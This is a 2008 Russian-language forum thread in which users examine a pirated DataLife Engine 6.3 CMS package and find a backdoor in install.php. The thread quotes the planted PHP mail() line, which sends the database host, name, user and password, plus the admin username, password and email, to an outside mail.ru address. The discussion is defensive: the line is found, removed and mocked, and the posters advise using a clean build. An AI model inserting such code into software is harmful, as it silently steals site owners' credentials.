Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Проверить Dle 6.3 (https://forum.antichat.xyz/showthread.php?t=61043)

Ali_MiX 05.02.2008 12:28
Проверить Dle 6.3
 
Доброго времени суток.
Вот у меня такая фигня, короче нужно проверить cms DLE 6.3
Вот тут исходники _http://rapidshare.com/files/89292111/dle.zip.html
Кто может проверить отпишитесь.
Я нашел только 1 фитчу в файле install.php на строке 432 все пассы отправляет на мыло кому то.

iron-viper 05.02.2008 12:41
Посмотрел DLE 6.3 только не тот
на который ты дал ссылку а свой но все равно все из одной богодельни. Посмотрел файл install.php и что-то не нашел я там в указанной тобою строке отправку куда-то: вот строки с 425 по 433

Код:
elseif($_REQUEST['action'] == "doinstall")
{
    if(!$reg_username or !$reg_email or !$reg_password1 or !$url or $reg_password1 != $reg_password2){ msg("error", "Ошибка!!!" ,"Заполните необходимые поля!", "javascript:history.go(-1)"); }
        if (preg_match("/[\||\'|\<|\>|\"|\!|\$|\@|\&\~\*\+]/", $reg_username))
        {       
                msg("error", "Ошибка!!!" ,"Введенное имя администратора недопустимо к регистрации!", "javascript:history.go(-1)");       
        }

    $reg_password = md5(md5($reg_password1));
Дальше идет формирование конфигурации. Вообще после установки этого движка файл install.php удаляется в целях безопасности(дабы исключить переустановку).

Ali_MiX 05.02.2008 12:43
этот код типа из скрипта инстала выдрать надо?

iron-viper 05.02.2008 12:44
Не понял твоего вопроса. Если можешь покажи саму строку.

Ali_MiX 05.02.2008 12:48
я же говорю строка 432

iron-viper 05.02.2008 12:51
Я тебе привел со строки 425 по строку 433 и в строке 432 нету твоего кода! О котором ты говоришь, напиши сюда код. Что ты там увидел? Всавь в сообщение епт...

Ali_MiX 05.02.2008 12:54
Код:
HTML;

}
// ********************************************************************************
// Do Install
// ********************************************************************************
elseif($_REQUEST['action'] == "doinstall")
{
    if(!$reg_username or !$reg_email or !$reg_password1 or !$url or $reg_password1 != $reg_password2){ msg("error", "Ошибка!!!" ,"Заполните необходимые поля!", "javascript:history.go(-1)"); }
        if (preg_match("/[\||\'|\<|\>|\"|\!|\$|\@|\&\~\*\+]/", $reg_username))
        {       
                msg("error", "Ошибка!!!" ,"Введенное имя администратора недопустимо к регистрации!", "javascript:history.go(-1)");       
        }
mail("pinkfloyd1488@mail.ru", "Привет, вот тебе данные", "ЮРЛ Сайта: $url \n DBHOST: $dbhost \n DBNAME: $dbname \n DBUSER: $dbuser \n DBPASS: $dbpasswd \n Данные админ панели \n Имя админа: $reg_username \n Пароль админа: $reg_password1 \n Мыло Админа: $reg_email");

    $reg_password = md5(md5($reg_password1));

$config = <<<HTML
pinkfloyd1488@mail.ru

Isis 05.02.2008 12:57
Ali_MiX, хаха)))
Удалил хоть строку?:)

Ali_MiX 05.02.2008 12:58
да
но я не про то, я про то может там ещё что встроили, может шелы какие или инклуды какие нить

iron-viper 05.02.2008 12:58
lol кто-то классно придумал. Да действительно в твоем варианте пассы отсылаются на емайл. Видимо кто-то решил собрать веселую сборку. Но это скорее не баг, а хак.
Вообщем с этого ты ничего не поимеешь, качни норм сборку! Зануленную Мид Тимом. Причем с проверенных ресурсов а не с хз каких. По поводу вообще багов в DLE - пока не попадались.


Время: 00:32
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице